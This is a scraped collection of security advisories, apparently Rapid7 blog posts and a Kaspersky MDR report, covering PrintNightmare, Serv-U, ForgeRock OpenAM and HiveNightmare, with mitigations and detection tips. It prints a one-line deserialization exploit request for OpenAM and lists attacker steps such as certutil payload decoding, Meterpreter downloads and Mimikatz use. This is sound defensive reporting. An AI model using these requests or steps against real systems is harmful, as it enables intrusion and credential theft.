[KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>), install the out-of-band updates released July 6, 2021, and disable Point and Print. Microsoft also recommends restricting non-administrators from installing any signed or unsigned printer drivers on printer servers. See the **Mitigation Guidance** section below for detailed guidance.\n\n**6 July 2021**: Since this blog was initially posted, additional information has become available. Microsoft has issued a new advisory and assigned a new CVE ID to the PrintNightmare vulnerability: [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). \nThe new guidance recommends disabling the print spooler, as we initially recommended, and also contains instructions to disable inbound remote printing through Group Policy.\n\nThese are only workarounds and a patch remains unavilable at this time. \nSince this vulnerability has no patch and multiple proofs-of-concept are freely available, we recommend implementing a workaround mitigation as soon as possible. We advise folowing one of the two workarounds on all Domain Controllers and any other Windows machines\u2014servers or clients\u2014which meet either of the following criteria:\n\n 1. Point and Print is enabled\n 2. The Authenticated Users group is nested within any of the groups that are listed in the [mitigation section of Microsoft's advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\nFrom a technical standpoint, additional information from Cube0x0 and Benjamin Delpy suggests that the `RpcAddPrinterDriver` is not the only vulnerable function, and the Win32 `AddPrinterDriverEx` function will also work correctly.Some proofs of concept used only the RPRN `RpcAddPrinterDriver` function and did not work on certain machines; others have been demonstrated to work on servers and clients other than domain controllers using `AddPrinterDriverEx`. This has also been referred to as "SharpPrintNightmare".\n\n## Mitigation Guidance\n\nUp until July 6, 2021, the most effective mitigation strategy was to disable the print spooler service itself. Since July 6, Microsoft's guidance on remediating CVE-2021-34527 has undergone several revisions. Updated mitigation guidance is below, and we have also preserved our original guidance on disabling the print spooler service. The Microsoft Security Response Center [published a blog](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) with the details below on July 8, 2021.\n\n**As of July 9, 2021:** \nTo fully remediate CVE-2021-34527, Windows administrators should review Microsoft's guidance in in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) and do the following:\n\n 1. Install the cumulative update released July 6, 2021.\n 2. Disable Point and Print by setting the following registry keys to `0` (or ensuring they are not present):\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n 3. Configure the `RestrictDriverInstallationToAdministrators` registry value to prevent non-administrators from installing printer drivers on a print server. Setting this value to 1 or any non-zero value prevents a non-administrator from installing any signed or unsigned printer driver on a printer server. Administrators can install both a signed or unsigned printer driver on a print server.\n\n**Note:** This guidance has been revised and reflects new information published by Microsoft on July 8, 2021. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` and `NoWarningNoElevationOnUpdate` registry keys to `0`. As of July 9, 2021, this information is outdated and Windows customers should use the [revised guidance](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>).\n\nAfter installing the July 2021 out-of-band update, all users will be either administrators or non-administrators. Delegates will no longer be honored. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for further information.\n\nIf your organization does not require printing to conduct business operations, you may also disable the print spooler service. This should be done on all endpoints, servers, and especially domain controllers. Dedicated print servers may still be vulnerable if the spooler is not stopped. Microsoft [security guidelines](<https://docs.microsoft.com/en-us/windows-server/security/windows-services/security-guidelines-for-disabling-system-services-in-windows-server#print-spooler>) do not recommend disabling the service across all domain controllers, since the active directory has no way to remove old queues that no longer exist unless the spooler service is running on at least one domain controller in each site. However, until this vulnerability is effectively patched, this should have limited impact compared to the risk.\n\nOn Windows cmd:\n \n \n net stop spooler\n \n\nOn PowerShell:\n \n \n Stop-Service -Name Spooler -Force\n Set-Service -Name Spooler -StartupType Disabled\n \n\nThe following PowerShell commands can be used to help find exploitation attempts:\n \n \n Get-WinEvent -LogName 'Microsoft-Windows-PrintService/Admin' | Select-String -InputObject {$_.message} -Pattern 'The print spooler failed to load a plug-in module'\n \n \n \n Get-WinEvent -FilterHashtable @{Logname='Microsoft-Windows-PrintService/Operational';ID=316} | Select-Object *\n \n\n## Rapid7 Customers\n\nWe strongly recommend that all customers either install the July 6, 2021 out-of-band updates **and** disable Point and Print via the two registry keys detailed in the `Mitigation Guidance` section above, **OR** disable the Windows Print Spooler service altogether on an emergency basis to mitigate the immediate risk of exploitation. InsightVM and Nexpose customers can assess their exposure to CVE-2021-34527 with authenticated checks in the July 8, 2021 content release. Checks look for the out-of-band patches Microsoft issued on July 6, 2021 and additionally ensure that Point and Print has been disabled in customer environments. InsightVM and Nexpose checks for CVE-2021-1675 were [released earlier in June](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-1675/>).\n\nVelociraptor users can use [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmare/>) and [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmaremonitor/>) to hunt for .dll files dropped during PrintNightmare exploitation. An exploit module is also available to Metasploit Pro customers.\n\nWe will continue to update this blog as further information comes to light.", "cvss3": {}, "published": "2021-06-30T18:15:59", "type": "rapid7blog", "title": "CVE-2021-34527 (PrintNightmare): What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1675", "CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-06-30T18:15:59", "id": "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "href": "https://blog.rapid7.com/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-12T22:56:36", "description": "![SolarWinds Serv-U FTP and Managed File Transfer CVE-2021-35211: What You Need to Know](https://blog.rapid7.com/content/images/2021/07/rapid7-og-1.jpg)\n\nOn July 12, 2021, SolarWinds confirmed an actively exploited zero-day vulnerability, CVE-2021-35211, in the Serv-U FTP and Managed File Transfer component of SolarWinds15.2.3 HF1 (released May 5, 2021) and all prior versions. Successful exploitation of CVE-2021-35211 could enable an attacker to gain remote code execution on a vulnerable target system. The vulnerability only exists when SSH is enabled in the Serv-U environment.\n\nA [hotfix for the vulnerability is available](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>), and **we recommend all customers of SolarWinds Serv-U FTP and Managed File Transfer install this hotfix immediately** (or, at minimum, disable SSH for a temporary mitigation). SolarWinds has emphasized that CVE-2021-35211 only affects Serv-U Managed File Transfer and Serv-U Secure FTP and does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. For further details, see [SolarWinds\u2019s advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>).\n\n## Details\n\nThe SolarWinds advisory cites threat intelligence provided by Microsoft. According to Microsoft, a single threat actor unrelated to this year\u2019s earlier [SUNBURST intrusions](<https://www.rapid7.com/blog/post/2020/12/14/solarwinds-sunburst-backdoor-supply-chain-attack-what-you-need-to-know/>) has exploited the vulnerability against a limited, targeted population of SolarWinds customers. The vulnerability exists in all versions of Serv-U 15.2.3 HF1 and earlier. Though Microsoft provided a proof-of-concept exploit to SolarWinds, there are no public proofs-of-concept as of July 12, 2021.\n\nThe vulnerability appears to be in the exception handling functionality in a portion of the software related to processing connections on open sockets. Successful exploitation of the vulnerability will cause the Serv-U product to throw an exception, then will overwrite the exception handler with the attacker\u2019s code, causing remote code execution.\n\n## Detection\n\nSince the vulnerability is in the exception handler, looking for exceptions in the `DebugSocketLog.txt` file may help identify exploitation attempts. Note, however, that exceptions can be thrown for many reasons and the presence of an exception in the log does not guarantee that there has been an exploitation attempt.\n\nIP addresses used by the threat actor include:\n \n \n 98.176.196.89 \n 68.235.178.32 \n 208.113.35.58\n \n\nRapid7 does not use SolarWinds Serv-U FTP products anywhere in our environment and is not affected by CVE-2021-35211.\n\nFor further information, see [Solarwinds\u2019s FAQ here](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211#FAQ>).", "cvss3": {}, "published": "2021-07-12T22:39:41", "type": "rapid7blog", "title": "SolarWinds Serv-U FTP and Managed File Transfer CVE-2021-35211: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-12T22:39:41", "id": "RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362", "href": "https://blog.rapid7.com/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-30T16:55:19", "description": "![ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability \$CVE-2021-35464\$: What You Need To Know](https://blog.rapid7.com/content/images/2021/06/hannah-gibbs-BINLgyrG_fI-unsplash.jpg)\n\nOn June 29, 2021, security researcher Michael Stepankin ([@artsploit](<https://twitter.com/artsploit>)) [posted details](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>) of [CVE-2021-35464](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-openam-cve-2021-35464>), a pre-auth remote code execution (RCE) vulnerability in ForgeRock [Access Manager](<https://www.forgerock.com/blog/tag/openam>) identity and access management software. ForgeRock front-ends web applications and remote access solutions in many enterprises.\n\nForgeRock has issued [Security Advisory #202104](<https://backstage.forgerock.com/knowledge/kb/book/b21824339#a47894244>) to provide information on this vulnerability and will be updating it if and when patches are available.\n\nThe weakness exists due to unsafe object deserialization via the [Jato framework](<https://docs.oracle.com/cd/E19454-01/819-0728/overview.html>), with a disturbingly diminutive proof of concept that requires a single `GET`/`POST` request for code execution:\n \n \n GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>\n \n\nForgeRock versions below 7.0 running on Java 8 are vulnerable and the weakness also exists in unpatched versions of the Open Identify Platform\u2019s [fork of OpenAM](<https://github.com/OpenIdentityPlatform/OpenAM>). ForgeRock/OIP installations running on Java 9 or higher are unaffected.\n\nAs of July 29, 2021 there are no patches for existing versions of ForgeRock Access Manager. Organizations must either upgrade to version 7.x or apply one of the following workarounds:\n\n**Option 1**\n\nDisable the VersionServlet mapping by commenting out the following section in the AM web.xml file (located in the `/path/to/tomcat/webapps/openam/WEB-INF` directory):\n \n \n <servlet-mapping> \n <servlet-name>VersionServlet</servlet-name> \n <url-pattern>/ccversion/*</url-pattern> \n </servlet-mapping>\n \n\nTo comment out the above section, apply the following changes to the web.xml file:\n \n \n \n \n\n**Option 2**\n\nBlock access to the `ccversion` endpoint using a reverse proxy or other method. On Apache Tomcat, ensure that access rules cannot be bypassed using known path traversal issues: [Tomcat path traversal via reverse proxy mapping](<https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/>).\n\nThe upgrades remove the vulnerable `/ccversion` HTTP endpoint along with other HTTP paths that used the vulnerable Jato framework.\n\nAs of Tuesday, June 29, 2021, Rapid7 Labs has been able to identify just over 1,000 internet-facing systems that appear to be using ForgeRock\u2019s OpenAM solution.\n\nAll organizations running ForgeRock OpenAM 7.0.x or lower (or are using the latest release of the Open Identify Platform\u2019s fork of OpenAM) are urged to prioritize upgrading or applying the mitigations within an accelerated patch window if possible, and at the very least within the 30-day window if you are following the typical 30-60-90 day patch criticality cadence.\u200c\u200c Furthermore, organizations that are monitoring web application logs and OpenAM server logs should look for anomalous `GET` or `POST` request volume to HTTP path endpoints that include `/ccversion` in them.\n\nFor individual vulnerability analysis, [see AttackerKB](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-openam-cve-2021-35464?referrer=blog#rapid7-analysis>).\n\nThis blog post will be updated with new information as warranted.\n\n_Header image photo by [Hannah Gibbs](<https://unsplash.com/@hannahmgibbs?utmsource=unsplash&utmmedium=referral&utmcontent=creditCopyText>) on [Unsplash](<https://unsplash.com/s/photos/forge?utmsource=unsplash&utmmedium=referral&utmcontent=creditCopyText>)_", "cvss3": {}, "published": "2021-06-30T15:26:49", "type": "rapid7blog", "title": "ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464): What You Need To Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-06-30T15:26:49", "id": "RAPID7BLOG:5223F0ED8D616DB4EE860CF6B7770388", "href": "https://blog.rapid7.com/2021/06/30/forgerock-openam-pre-auth-remote-code-execution-vulnerability-what-you-need-to-know/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-31T08:56:21", "description": "![Microsoft SAM File Readability CVE-2021-36934: What You Need to Know](https://blog.rapid7.com/content/images/2021/07/file-cabinets.jpeg)\n\nOn Monday, July 19, 2021, community security researchers began [reporting](<https://twitter.com/jonasLyk/status/1417205166172950531>) that the Security Account Manager (SAM) file on Windows 10 and 11 systems was READ-enabled for all local users. The SAM file is used to store sensitive security information, such as hashed user and admin passwords. READ enablement means attackers with a foothold on the system can use this security-related information to escalate privileges or access other data in the target environment.\n\nOn Tuesday, July 20, Microsoft issued an out-of-band advisory for this vulnerability, which is now tracked as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). As of July 22, 2021, the vulnerability has been confirmed to affect Windows 10 version 1809 and later. A public proof-of-concept is available that allows non-admin users to retrieve all registry hives. Researcher Kevin Beaumont has also [released a demo](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>) that confirms CVE-2021-36934 can be used to obtain local hashes and pass them to a remote machine, achieving remote code execution as SYSTEM on arbitrary targets (in addition to privilege escalation). The security community has christened this vulnerability \u201cHiveNightmare\u201d and \u201cSeriousSAM.\u201d\n\nCERT/CC [published in-depth vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>) on CVE-2021-36934, which we highly recommend reading. Their analysis reveals that starting with Windows 10 build 1809, the BUILTIN\\Users group is given RX permissions to files in the `%windir%\\system32\\config` directory. If a VSS shadow copy of the system drive is available, a non-privileged user may leverage access to these files to:\n\n * Extract and leverage account password hashes.\n * Discover the original Windows installation password.\n * Obtain DPAPI computer keys, which can be used to decrypt all computer private keys.\n * Obtain a computer machine account, which can be used in a [silver ticket attack](<https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>).\n\n**There is no patch for CVE-2021-36934 as of July 21, 2021.** Microsoft has released workarounds for Windows 10 and 11 customers that mitigate the risk of immediate exploitation\u2014we have reproduced these workarounds in the `Mitigation Guidance` section below. Please note that Windows customers must **BOTH** restrict access and delete shadow copies to prevent exploitation of CVE-2021-36934. We recommend applying the workarounds on an emergency basis.\n\n## Mitigation Guidance\n\n**1\\. Restrict access to the contents of `%windir%\\system32\\config`:**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command:\n \n \n icacls %windir%\\system32\\config\\*.* /inheritance:e\n \n\n**2\\. Delete Volume Shadow Copy Service (VSS) shadow copies:**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point if desired.\n\n**Windows 10 and 11 users must apply both workarounds to mitigate the risk of exploitation.** Microsoft has noted that deleting shadow copies may impact restore operations, including the ability to restore data with third-party backup applications.\n\nThis story is developing quickly. We will update this blog with new information as it becomes available.\n\n## Updates\n\n**July 27, 2021:** Microsoft has **removed Windows Server 2019 and Windows Server 20H2** from the list of versions affected by CVE-2021-36934.\n\n**July 22, 2021:** Microsoft added Windows Server 2019 and Windows Server 20H2 to the [list of affected versions](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>).\n\n## Resources\n\n * [Microsoft advisory for CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)\n * [CERT/CC vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>)\n * [Public PoC for CVE-2021-36934](<https://github.com/GossiTheDog/HiveNightmare>)\n * [Additional demo and analysis of CVE-2021-36934](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>)", "cvss3": {}, "published": "2021-07-21T16:01:19", "type": "rapid7blog", "title": "Microsoft SAM File Readability CVE-2021-36934: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T16:01:19", "id": "RAPID7BLOG:21FF66FD08C23AC39BCCB8CFE2238507", "href": "https://blog.rapid7.com/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T15:05:39", "description": "## We just couldn't contain ourselves!\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/10/metasploit-pumpkin-1-1.jpg)\n\nThis week we've got two Kubernetes modules coming at you from [adfoster-r7](<https://github.com/adfoster-r7>) and [smcintyre-r7](<https://github.com/smcintyre-r7>). First up is an enum module `auxiliary/cloud/kubernetes/enum_kubernetes` that'll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! Next is an authenticated code execution module `exploit/multi/kubernetes/exec` (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.\n\n## Atlassian Confluence WebWork OGNL Injection gets Windows support\n\nYou might remember [Confluence Server CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>) making an appearance in a wrap-up last month, and it's back! Rapid7\u2019s own [wvu-r7](<https://github.com/wvu-r7>) has updated his Confluence Server exploit to support Windows targets.\n\n## New module content (2)\n\n * [Kubernetes Enumeration](<https://github.com/rapid7/metasploit-framework/pull/15786>) by Spencer McIntyre and Alan Foster - This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.\n * [Kubernetes authenticated code execution](<https://github.com/rapid7/metasploit-framework/pull/15733>) by Spencer McIntyre and Alan Foster - Adds a new `exploit/multi/kubernetes/exec` module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host's file system when possible.\n\n## Enhancements and features\n\n * [#15732](<https://github.com/rapid7/metasploit-framework/pull/15732>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds terminal size synchronisation for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15769](<https://github.com/rapid7/metasploit-framework/pull/15769>) from [wvu-r7](<https://github.com/wvu-r7>) \\- Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.\n * [#15773](<https://github.com/rapid7/metasploit-framework/pull/15773>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit's Kubernetes modules and pivoting capabilities. The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.\n\n## Bugs fixed\n\n * [#15760](<https://github.com/rapid7/metasploit-framework/pull/15760>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an issue when attempting to store JSON loot, where the extension was always being set to `bin` instead of `json`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-13T09%3A47%3A12-05%3A00..2021-10-21T11%3A22%3A54-04%3A00%22>)\n * [Full diff 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/compare/6.1.10...6.1.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-10-22T14:25:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T14:25:55", "id": "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "href": "https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2021-12-15T10:54:49", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15092025/abstract-security-alert-sl-990x400.jpg)\n\n_Kaspersky Managed Detection and Response (MDR) provides advanced protection against the growing number of threats that bypass automatic security barriers. Its capabilities are backed by a high-professional team of security analysts operating all over the world. Each suspicious security event is validated by our analysts complementing the automatic detection logic and letting us continuously improve the detection rules._\n\n_The MDR results allow us to map out the modern threat landscape and show techniques used by attackers right now. We share these results with you so that you are more informed about in-the-wild attacks and better prepared to respond._\n\n## PrintNightmare vulnerability exploitation\n\nThis summer, we witnessed a series of attacks using a dangerous vulnerability in the Windows Print Spooler service: **CVE-2021-1675/CVE-2021-34527**, also known as [PrintNightmare](<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>). This vulnerability was published in June 2021 and allows attackers to add arbitrary printer drivers in the spooler service and thus remotely execute code on a vulnerable host under System privileges. We have already [published](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) the technical details of this vulnerability, and today we will talk about how MDR analysts detected and investigated attacks that exploit this vulnerability in real companies.\n\n### Case #1\n\nShortly after the PrintNightmare vulnerability was published, a detailed report with a technical description of the problem, as well as a working PoC exploit, was posted on GitHub by mistake. The repository was disconnected several hours later, but during this time several other users managed to clone it.\n\nKaspersky detected an attempt to exploit the PrintNightmare vulnerability using this publicly available tool. The MDR team observed a request to suspicious _DLL_ libraries from the spooler service. It should be noted, that the file names used by the attacker were exactly the same as those available in the public exploit on GitHub.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094255/MDR-cases-01.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150920/MDR_interesting_cases_02.png>) | Kaspersky detected suspicious DLL libraries (nightmare.dll) on the monitored host. | C:\\Windows\\System32\\spool\\drivers\\x64\\3\\nightmare.dll C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\nightmare.dll \n---|---|--- \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094253/MDR-cases-02.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | In addition, the following script was found on the host. | \\cve-2021-1675-main-powershell\\cve-2021-1675-main\\cve-2021-1675.ps1 \n \nThe table below contains signs of suspicious activity that served as a starting point for the investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1210:** \nExploitation of \nRemote \nServices | Local File Modification | Modified file path: \nC:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\ \n1\\nightmare.dll \nFile modifier: \nC:\\Windows\\System32\\spoolsv.exe \nParent of the modifier: \nC:\\Windows\\System32\\services.exe | Legitimate spoolsv.exe \nlocally modified \nc:\\windows\\system32 \n\\spool\\drivers\\x64\\ \n3\\old\\1\\nightmare.dll \n**T1588.005:** \nObtain \nCapabilities: \nExploits | AV exact detect in \nOnAccess mode | File: \n\\cve-2021-1675-main-powershell\\cve-2021- \n1675-main\\cve-2021-1675.ps1 \nAV verdicts: \nExploit.Win64.CVE-2021-1675.c; \nUDS:Exploit.Win64.CVE-2021-1675.c | CVE-2021-1675 exploit \nwas detected and \nsuccessfully deleted \nby AM engine \n \n### Case #2\n\nIn another case, MDR analysts discovered a different attack scenario related to the exploitation of the PrintNightmare vulnerability. In particular, _spooler_ service access to suspicious _DLL_ files was observed. In addition, the _spooler_ service executed some unusual commands and established a network connection. Based on the tools used by attackers, we presume that this activity was related to penetration testing.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094255/MDR-cases-01.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150920/MDR_interesting_cases_02.png>) | MDR analyst detected the creation of suspicious _DLL_ libraries using the _certutil.exe_ tool on a monitored host. \nAfter that, the _spooler_ service was added to the planned tasks. | C:\\Windows\\System32\\spool\\driver \ns\\x64\\3\\new\\hello.dll \nC:\\Windows\\System32\\spool\\driver \ns\\x64\\3\\new\\unidrv.dll\u2026 \n---|---|--- \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094251/MDR-cases-03.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151142/MDR_interesting_cases_03.png>) | Next, the spooler service called the newly created _DLL_ files. \nIn addition, the attacker ran some of the created libraries using the rundll32 component. | \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094248/MDR-cases-04.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151347/MDR_interesting_cases_04.png>) | Several hours later, a new wave of activity began. The Kaspersky MDR team detected a registry key modification that forces NTLMv1 authentication. It potentially allows [NTLM hashes](<https://book.hacktricks.xyz/windows/ntlm#basic-ntlm-domain-authentication-scheme>) to be intercepted. | \\REGISTRY\\MACHINE\\SYSTEM\\Control \nSet001\\Control\\Lsa\\MSV1_0 \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094253/MDR-cases-02.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | Then the attacker re-added spooler to the planned tasks. \nAfter that, execution of various commands on the host with System privileges was observed. The source of this activity was _c:\\windows\\system32\\spoolsv.exe_ process | C:\\Windows\\System32\\cmd.exe /c \nnet start spooler \nC:\\Windows\\System32\\cmd.exe /c \ntimeout 600 &gt; NUL &amp;&amp; \nnet start spooler \n \nThe table below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1570: ** \nLateral Tool Transfer | Web AV exact detect in _OnDownload_ mode | AV verdict: HEUR:Trojan.Win32.Shelma.gen | Attacker downloads \nsuspicious DLL (that is, \nMeterpreter payload) via \nHTTP \n**T1140:** \nDeobfuscate/Decode Files or Information | Local File Modification | Process command lines: \ncertutil -decode 1.txt \nC:\\Share\\hello4.dll | Attacker used _certutil_ \nto decode text file into PE \nbinary \n**T1003.001: \n**OS Credential Dumping: LSASS Memory | AV exact detect in _OnAccess_ mode | AV verdicts: \nVHO:Trojan\u2011PSW.Win64.Mimikatz.gen \nTrojan-PSW.Win32.Mimikatz.gen | Attacker tried to use \nMimikatz \n**T1127.001: \n**Trusted Developer Utilities Proxy Execution: MSBuild | Outbound network connection | Process command line: \nC:\\Windows\\Microsoft.NET\\Framework\\v4 \n.0.30319\\MSBuild.exe C:\\Share\\1.xml | MSBuild network activity \n**T1210: \n**Exploitation of Remote Services | Local File Modification | Modified file path: \nC:\\Windows\\System32\\spool\\drivers\\x64 \n\\3\\old\\1\\hello5.dllFile modifier: \nC:\\Windows\\System32\\spoolsv.exe \nParent of the modifier: \nC:\\Windows\\System32\\services.exe | Legitimate \nspoolsv.exe locally \nmodified \nc:\\windows\\system3 \n2\\spool\\drivers\\x6 \n4\\3\\old\\1\\hello5.dll \n**T1547.012: \n**Boot or Logon Autostart Execution: Print Processors \n**T1033: \n**System Owner/User Discovery | Process start | Command line: whoami \nProcess integrity level: System \nParent process: \nC:\\WINDOWS\\System32\\spoolsv.exe \nGrandparent process: \nC:\\Windows\\System32\\services.exe | Legitimate \nspoolsv.exe started \nwhoami with System \nintegrity level \n**T1547.012:** \nBoot or Logon Autostart Execution: Print Processors | Outbound network connection | Process command line: \nC:\\Windows\\System32\\spoolsv.exe \nRemote TCP port: 4444/TCP | Legitimate \nspoolsv.exe made a \nconnection to default \nMeterpreter port \n(4444/TCP) \n**T1547.012:** \nBoot or Logon Autostart Execution: Print Processors \n**T1059.003:** \nCommand and Scripting Interpreter: Windows Command Shell \n**T1033:** \nSystem Owner/User Discovery | Process start | Command line: whoami \nProcess integrity level: System \nParent process: \nC:\\Windows\\System32\\cmd.exe \nGrandparent process: \nC:\\Windows\\System32\\spoolsv.exe | Legitimate \nspoolsv.exe started \ncmd.exe that started \nwhoami with System \nintegrity level \n \n## MuddyWater attack\n\nIn this case, the Kaspersky MDR team detected a request from the customer's infrastructure to a malicious APT related host. Further investigation allowed us to attribute this attack to the [MuddyWater group](<https://attack.mitre.org/groups/G0069/>). MuddyWater is a threat actor that first surfaced in 2017. This APT group mainly targets government agencies in Iraq, Saudi Arabia, Jordan, Turkey, Azerbaijan, and Pakistan. 